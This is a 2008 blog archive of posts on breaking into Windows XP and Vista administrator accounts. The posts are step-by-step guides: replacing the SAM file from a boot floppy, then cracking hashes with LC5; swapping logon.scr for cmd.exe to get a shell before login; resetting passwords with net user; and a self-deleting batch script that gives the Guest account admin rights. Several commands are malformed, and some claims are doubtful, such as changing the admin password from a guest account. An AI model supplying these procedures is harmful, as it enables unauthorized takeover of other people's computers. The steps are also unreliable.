JAIMIN WORLD

Journey to Knowledge

Archive for the ‘Windows Password Hack’ Category

Hacking Windows Administrator Password

Posted by jaiminworld on September 17, 2008

This article introduce very simple way to hack Administrator Password on Win XP System.This tutorial tells you how to break administrator password and gain access to admin account.Also if you need to crack/reveal the password you find the steps here to accomplish that also.

First of all let us have a close look at the Security flaws/Loopholes in Win XP

Microsoft stores all Security Information in many files but the main file is the SAM file (Security Accounts Manager)! this file contain security information about users(mainly Password).You can explore the SAM file here in this folder

$windows\system32\config

SAM is the file which contains the passwords in the form of a HASH.A HASH is a mathematically irreversible form of encryption,so that theres no way of decrypting the password back .Also there’s a file called SECURITY that contains a list of all users in the system & their related information

We will Not be able To copy them Under XP since it doesn’t support any attempt to copy this file.

The Idea Behind Cracking the password

The Idea is simple I will explain it manually and it can also be programmed.Here’s the idea..

The SAM contain’s a Security Information(password/s), so I have created a Free Windows XP SP2 Logon account (Administrator Account without password) that means when windows Launch it Will enter directly to the system without asking about any password.So, this SAM file contain’s an open password(no password).If you have two operating system then you can get this type of SAM file from another operating system for your further use in breaking the password of the system.

So, the idea here is to replace the SAM file of victim’s computer(which contain’s password) with the SAM file which contains no password.When this is done the password of the victim’s account is erased and it let’s anyone to login to the computer as if there is no password set by admin.

But this SAM file cannot be manipulated(copy/rename/replace/delete) when the operating system is running.So here are some of the ideas to replace this SAM file.

1.If there are two OS installed on the computer we can boot from other OS and replace the SAM file located at

$:\windows\system32\config

2.If there is only a single OS then use the tool NTFS4DOS (http://www.free-av.com/antivirclassic/avira_ntfs4dos.html) to access the location of the SAM and SECURITY files from the boot command prompt.

NTFS4DOS creates a bootable floppy disk.You can use this floppy to access the NTFS drives by booting the system and mounting it to DOS.

Here are the steps to be followed to break the password.

1- Get the SAM file from another OS.

2- Go to the target Machine , and try to Access it by Booting from the floppy created by NTFS4DOS or by other OS(incase you have two OS installed)

3- After Getting Access to the Boot Command prompt c:> Go to the config folder

$windir$\system32\config

And Copy the SAM File and SYSTEM File(we will need it later) To other any folder, Then replace the original SAM file(In $windows$\system32\config) with the SAM file i have provided

5- Reboot and Make windows enter Normally

6- Yeah, Now you can directly enter the system without any password. ie:The PW is broken!.

Now you have broken the system administrator password and you can directly enter system.Now one phase of the password hack is over.If you need to know/crack the admin password then you can use the two files SAM & SECURITY that you have copied in the above STEP-3(This step is optional).It is done as follows.

Download any of the following Password crackers

1.LC4 (Lophtcrack).New version is LC5

OR

2.SAMINSIDE

LC5 is better according to me

Once you have either of the two password cracking tools,you can load the SAM & SECURITY files and start the cracking process.This process may take a long time since it is Bruteforce method depending on the size of the password.

NOTE: THE ABOVE METHOD IS ALSO APPLICABLE FOR WINDOWS VISTA

WARNING: THE ABOVE INFORMATION IF FOR EDUCATIONAL PURPOSES ONLY

Posted in WINDOWS Hack, Windows Password Hack | Tagged: , , , , , , | 1 Comment »

Hack Administrator by bootable device

Posted by jaiminworld on September 17, 2008

Here we present the rock solid windows hacks
for educational purpose only!

This
is a utility to (re)set the password of any user that has a valid
(local) account on your Windows NT/2000/XP/2003/Vista system, by
modifying the encrypted password in the registry’s SAM file.
You do not need to know the old password to set a new one.
It
works offline, that is, you have to shutdown your computer and boot off
a floppy disk or CD. The boot-disk includes stuff to access NTFS
partitions and scripts to glue the whole thing together.
Works with syskey (no need to turn it off, but you can if you have lost the key)
Will detect and offer to unlock locked or disabled user accounts!
Caution:
If used on users that have EFS encrypted files, and the system is XP or
later service packs on W2K, all encrypted files for that user will be
UNREADABLE! and cannot be recovered unless you remember the old
password again!
Download links:
cd070409.zip (~3MB) – Bootable CD image with newer drivers
bd050303.zip (~1.1MB) – Bootdisk image, date 050303.
sc050303.zip(~1.4MB) – SCSI-drivers (050303) (only use newest drivers with newest bootdisk, this one works with bd050303)
To
write these images to a floppy disk you’ll need RawWrite2 which is
included in the Bootdisk image download. To create the CD you just need
to use your favorite CD burning program and burn the .ISO file to CD.

Posted in WINDOWS Hack, Windows Password Hack | Tagged: , , , , , , | Leave a Comment »

Hack Administrator password after logon

Posted by jaiminworld on September 17, 2008

You can change Administrator password from guest account without using any programs. It’s easy:
1. Start-> Run, type lusrmgr.msc and hit Enter.
2. You will see window with two folders:Users and Groups. Go in the Users folder, find the Administrator, right click-> Set Password and now you can change the password without knowing the old one.

Posted in WINDOWS Hack, Windows Password Hack | Tagged: , , , , , , | Leave a Comment »

Hack the password from command prompt

Posted by jaiminworld on September 17, 2008

1.Open command prompt (Go to :Start > Run and type : cmd).
2.Type following command :

There are two commands you can use any one of them

1.net user “username” “password”

OR

2.control userpasswords2 “username” “password”

where “username” is username of account you want to hack and “password” is password that you want that is of your choice.

Posted in WINDOWS Hack, Windows Password Hack | Tagged: , , , , , , | Leave a Comment »

Changing Windows Administrator Password Without Knowing It

Posted by jaiminworld on September 17, 2008

Yes it is possible to change Adminstrator password both in Win XP and Vista without knowing it.If you somehow manage to login as an Administrator then you can change the password without knowing it.

Heres the Step-By-Step instructions

1. Right-click on the “My Computer” icon on the desktop OR in the Start Menu.

2. Select the option “Manage”.

3. On the left pane expand the “Computer Management (Local) tree (if it is not already expanded)

4. Double click “Local Users and Groups” option From “System Tools” tree.

5. Click the “Users” option.

6. Now you will see the list of users on the right side pane,such as Administrator,Guest etc.

7. Right click the “Administrator” and select the option “Set Password” option.

8. Now you will see a warning message,Click on proceed.

9. Now the system asks you for “New Password” and “Confirm Password” .

10. After entering the password click on “OK”.The password is changed.That’s It!

Posted in WINDOWS Hack, Windows Password Hack | Tagged: , , , , , | 1 Comment »

How to Hack Administrator Password of Window XP without PC Open!!

Posted by jaiminworld on September 17, 2008

Lets do it fast….

1. Go to Start –> Run –> Type in CMD
2. Enter command: cd\ windows\system32
3. mkdir newpass
4. copy logon.scr newpass\logon.scr
5. copy cmd.exe newpass\cmd.exe
6. del logon.scr
7. rename cmd.exe logon.scr

So basically you are telling windows is to backup the command program and the screen saver file. Then we edited the settings so when windows loads the screen saver, we will get an unprotected dos prompt without logging in. When this appears enter this command

net user password

Example: If the admin username is ‘jaiminworld’ and you want change the password to ‘yourpassword’ Then type in the following command

net user jaiminworld yourpassword

This will change the administrator password to yourpassword.
Thats it you have sucessfully hacked the Window XP Administrator Password now you can Log in, using the hacked Window XP Administrator Password and do whatever you want to do.

Posted in WINDOWS Hack, Windows Password Hack | Tagged: , , , , , | Leave a Comment »

HACK admin from GUEST

Posted by jaiminworld on September 17, 2008

Please Dont missuse This ARTICLE. Its meant for “Educational Purpose” only or for helping those who have lost their PASSWORD.

Hack “GUEST” with Admin privileges……..

echo off
title Please wait…
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0

Copy this to notepad and save the file as “adminhack.bat”
then u can double click the file to execute or run in the cmd.
it works…

Posted in WINDOWS Hack, Windows Password Hack | Tagged: , , , , , , | Leave a Comment »